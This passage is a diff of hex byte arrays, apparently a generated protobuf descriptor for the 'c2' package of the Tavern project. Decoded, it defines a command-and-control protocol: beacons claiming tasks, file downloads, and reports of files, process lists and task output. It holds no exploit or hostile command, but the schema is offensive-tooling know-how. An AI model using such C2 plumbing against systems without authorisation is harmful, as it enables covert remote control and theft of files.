0x73, 0x12, 0x10, 0x0a, 0x03, 0x70, 0x69, 0x64, - 0x18, 0x01, 0x20, 0x01, 0x28, 0x04, 0x52, 0x03, 0x70, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x70, - 0x70, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x04, 0x52, 0x04, 0x70, 0x70, 0x69, 0x64, 0x12, - 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, - 0x61, 0x6d, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, - 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, - 0x6c, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x04, 0x70, 0x61, 0x74, 0x68, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x6d, 0x64, 0x18, 0x06, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x03, 0x63, 0x6d, 0x64, 0x12, 0x10, 0x0a, 0x03, 0x65, 0x6e, 0x76, 0x18, 0x07, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x65, 0x6e, 0x76, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x77, 0x64, - 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x63, 0x77, 0x64, 0x12, 0x2a, 0x0a, 0x06, 0x73, - 0x74, 0x61, 0x74, 0x75, 0x73, 0x18, 0x09, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x12, 0x2e, 0x63, 0x32, - 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x2e, 0x53, 0x74, 0x61, 0x74, 0x75, 0x73, 0x52, - 0x06, 0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x22, 0xab, 0x02, 0x0a, 0x06, 0x53, 0x74, 0x61, 0x74, - 0x75, 0x73, 0x12, 0x16, 0x0a, 0x12, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x53, - 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x53, 0x54, - 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x4b, 0x4e, 0x4f, 0x57, 0x4e, 0x10, 0x01, 0x12, 0x0f, - 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x49, 0x44, 0x4c, 0x45, 0x10, 0x02, 0x12, - 0x0e, 0x0a, 0x0a, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x52, 0x55, 0x4e, 0x10, 0x03, 0x12, - 0x10, 0x0a, 0x0c, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x53, 0x4c, 0x45, 0x45, 0x50, 0x10, - 0x04, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x53, 0x54, 0x4f, 0x50, - 0x10, 0x05, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x5a, 0x4f, 0x4d, - 0x42, 0x49, 0x45, 0x10, 0x06, 0x12, 0x12, 0x0a, 0x0e, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, - 0x54, 0x52, 0x41, 0x43, 0x49, 0x4e, 0x47, 0x10, 0x07, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, - 0x54, 0x55, 0x53, 0x5f, 0x44, 0x45, 0x41, 0x44, 0x10, 0x08, 0x12, 0x14, 0x0a, 0x10, 0x53, 0x54, - 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x45, 0x5f, 0x4b, 0x49, 0x4c, 0x4c, 0x10, 0x09, - 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x49, 0x4e, - 0x47, 0x10, 0x0a, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x50, 0x41, - 0x52, 0x4b, 0x45, 0x44, 0x10, 0x0b, 0x12, 0x17, 0x0a, 0x13, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, - 0x5f, 0x4c, 0x4f, 0x43, 0x4b, 0x5f, 0x42, 0x4c, 0x4f, 0x43, 0x4b, 0x45, 0x44, 0x10, 0x0c, 0x12, - 0x24, 0x0a, 0x20, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x49, 0x4e, 0x54, 0x45, - 0x52, 0x55, 0x50, 0x54, 0x49, 0x42, 0x4c, 0x45, 0x5f, 0x44, 0x49, 0x53, 0x4b, 0x5f, 0x53, 0x4c, - 0x45, 0x45, 0x50, 0x10, 0x0d, 0x22, 0xe9, 0x01, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, - 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x1a, - 0x0a, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, - 0x52, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x12, 0x38, 0x0a, 0x0a, 0x70, 0x61, - 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x18, 0x03, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x18, - 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x2e, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, - 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, 0x79, 0x52, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, - 0x74, 0x65, 0x72, 0x73, 0x12, 0x1d, 0x0a, 0x0a, 0x66, 0x69, 0x6c, 0x65, 0x5f, 0x6e, 0x61, 0x6d, - 0x65, 0x73, 0x18, 0x04, 0x20, 0x03, 0x28, 0x09, 0x52, 0x09, 0x66, 0x69, 0x6c, 0x65, 0x4e, 0x61, - 0x6d, 0x65, 0x73, 0x12, 0x1d, 0x0a, 0x0a, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, - 0x65, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x71, 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, - 0x6d, 0x65, 0x1a, 0x3d, 0x0a, 0x0f, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, - 0x45, 0x6e, 0x74, 0x72, 0x79, 0x12, 0x10, 0x0a, 0x03, 0x6b, 0x65, 0x79, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x03, 0x6b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, - 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x3a, 0x02, 0x38, - 0x01, 0x22, 0x1d, 0x0a, 0x09, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, - 0x0a, 0x03, 0x6d, 0x73, 0x67, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, - 0x22, 0xe3, 0x01, 0x0a, 0x0a, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, - 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, - 0x16, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, - 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, - 0x45, 0x72, 0x72, 0x6f, 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, - 0x65, 0x78, 0x65, 0x63, 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, - 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, - 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, - 0x70, 0x52, 0x0d, 0x65, 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, - 0x12, 0x44, 0x0a, 0x10, 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, - 0x64, 0x5f, 0x61, 0x74, 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, - 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, - 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, - 0x73, 0x68, 0x65, 0x64, 0x41, 0x74, 0x22, 0x37, 0x0a, 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, - 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, - 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, - 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x52, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, - 0x34, 0x0a, 0x12, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, - 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x1e, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, - 0x20, 0x03, 0x28, 0x0b, 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, - 0x74, 0x61, 0x73, 0x6b, 0x73, 0x22, 0x29, 0x0a, 0x13, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, - 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, - 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, - 0x22, 0x2c, 0x0a, 0x14, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, - 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, - 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0xdc, - 0x01, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, - 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, - 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x12, 0x0a, - 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x70, 0x61, 0x74, - 0x68, 0x12, 0x14, 0x0a, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, - 0x52, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x12, 0x14, 0x0a, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, - 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x12, 0x20, 0x0a, - 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x18, 0x05, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, - 0x12, 0x0a, 0x04, 0x73, 0x69, 0x7a, 0x65, 0x18, 0x06, 0x20, 0x01, 0x28, 0x03, 0x52, 0x04, 0x73, - 0x69, 0x7a, 0x65, 0x12, 0x22, 0x0a, 0x0d, 0x73, 0x68, 0x61, 0x33, 0x5f, 0x32, 0x35, 0x36, 0x5f, - 0x68, 0x61, 0x73, 0x68, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x73, 0x68, 0x61, 0x33, - 0x32, 0x35, 0x36, 0x48, 0x61, 0x73, 0x68, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, - 0x18, 0x08, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x14, 0x0a, - 0x12, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, - 0x6e, 0x73, 0x65, 0x22, 0x54, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, - 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, - 0x1f, 0x0a, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x0b, 0x2e, - 0x63, 0x32, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, - 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, - 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x22, 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, - 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x26, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, - 0x0b, 0x32, 0x0e, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, - 0x74, 0x52, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, - 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x32, 0xea, 0x02, 0x0a, 0x02, 0x43, 0x32, 0x12, 0x3d, 0x0a, 0x0a, - 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, - 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, - 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x43, 0x0a, 0x0c, 0x44, - 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x17, 0x2e, 0x63, 0x32, - 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, - 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, - 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, - 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, - 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, - 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, - 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, - 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, - 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, - 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, - 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, - 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, - 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, - 0x22, 0x00, 0x42, 0x2e, 0x5a, 0x2c, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x63, 0x6f, 0x6d, - 0x2f, 0x6b, 0x63, 0x61, 0x72, 0x72, 0x65, 0x74, 0x74, 0x6f, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, - 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, - 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, + 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, 0x10, 0x04, 0x22, 0x59, 0x0a, + 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x22, 0x0a, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x18, 0x02, 0x20, + 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x54, + 0x6f, 0x6d, 0x65, 0x52, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x12, 0x1d, 0x0a, 0x0a, 0x71, 0x75, 0x65, + 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x71, + 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x1d, 0x0a, 0x09, 0x54, 0x61, 0x73, 0x6b, + 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, 0x0a, 0x03, 0x6d, 0x73, 0x67, 0x18, 0x01, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, 0x22, 0xe3, 0x01, 0x0a, 0x0a, 0x54, 0x61, 0x73, 0x6b, + 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, + 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x16, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, + 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x23, + 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0d, 0x2e, + 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x52, 0x05, 0x65, 0x72, + 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, 0x65, 0x78, 0x65, 0x63, 0x5f, 0x73, 0x74, 0x61, 0x72, + 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, + 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, + 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0d, 0x65, 0x78, 0x65, 0x63, 0x53, 0x74, + 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, 0x12, 0x44, 0x0a, 0x10, 0x65, 0x78, 0x65, 0x63, 0x5f, + 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x05, 0x20, 0x01, 0x28, + 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, + 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0e, 0x65, + 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x41, 0x74, 0x22, 0x37, 0x0a, + 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, + 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x18, 0x01, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x52, 0x06, + 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, 0x34, 0x0a, 0x12, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, + 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x1e, 0x0a, 0x05, + 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x08, 0x2e, 0x63, 0x32, + 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x22, 0x29, 0x0a, 0x13, + 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, + 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x22, 0x2c, 0x0a, 0x14, 0x44, 0x6f, 0x77, 0x6e, 0x6c, + 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, + 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x05, + 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x52, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, + 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, + 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, + 0x6b, 0x49, 0x64, 0x12, 0x24, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, 0x69, + 0x6c, 0x65, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x14, 0x0a, 0x12, 0x52, 0x65, 0x70, + 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, + 0x5e, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, + 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, + 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, + 0x73, 0x6b, 0x49, 0x64, 0x12, 0x29, 0x0a, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 